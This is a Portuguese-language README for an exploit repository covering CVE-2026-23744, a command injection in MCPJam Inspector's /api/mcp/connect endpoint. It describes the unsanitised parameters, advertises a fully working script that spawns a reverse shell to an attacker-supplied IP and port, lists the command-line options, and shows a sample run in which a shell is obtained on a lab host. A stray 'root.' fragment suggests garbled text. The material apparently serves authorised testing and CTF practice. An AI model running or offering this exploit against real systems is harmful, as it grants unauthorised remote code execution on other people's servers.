
CVE-2026-23744 é uma injeção de comandos não autenticada no MCPJam Inspector ≤1.4.2 via /api/mcp/connect. Este POC explora essa vulnerabilidade enviando um payload JSON personalizado para executar comandos arbitrários, concedendo um reverse shell com PTY.
Este proof-of-concept é fornecido exclusivamente para investigação de segurança autorizada, fins educativos e ambientes de laboratório controlados (por exemplo, HTB, CTF, ou testes de penetração internos com consentimento escrito explícito). A utilização não autorizada contra qualquer sistema sem permissão é ilegal e antiética. O autor não assume qualquer responsabilidade por utilização indevida; os utilizadores são os únicos responsáveis por cumprir todas as leis e regulamentos aplicáveis.
CVE-2026-23744 é uma vulnerabilidade de injeção de comandos não autenticada no MCPJam Inspector (versão ≤ 1.4.2).
O endpoint /api/mcp/connect aceita um payload JSON com serverConfig.command e serverConfig.args e passa-os diretamente para a criação de um processo do sistema sem qualquer sanitização. Um atacante pode enviar um pedido malicioso para executar comandos arbitrários do sistema, obtendo uma reverse shell com os privilégios do utilizador do serviço.
Este repositório contém um script de exploit totalmente funcional com um listener interativo opcional baseado em PTY (ativado por padrão).
requests (pip install requests)Importante: Forneça apenas o hostname ou IP. O script adiciona automaticamente http:// ou https://
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
| Opção | Descrição |
|---|---|
-t, --target | Hostname ou IP do alvo (obrigatório) |
-p, --port | Porta do alvo (padrão: 6274) |
-l, --lhost | Seu IP para a reverse shell (obrigatório) |
-r, --lport | Sua porta de listener (padrão: 4444) |
--ssl | Usar HTTPS em vez de HTTP |
--check-only | Apenas verificar a vulnerabilidade, não enviar shell |
O script inicia o seu próprio listener e fornece uma shell diretamente no seu terminal.
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root.Este repositório é apenas para fins educativos e de testes autorizados. Utilize por sua conta e risco.
Autor: Mluex0 Data: Agosto de 2026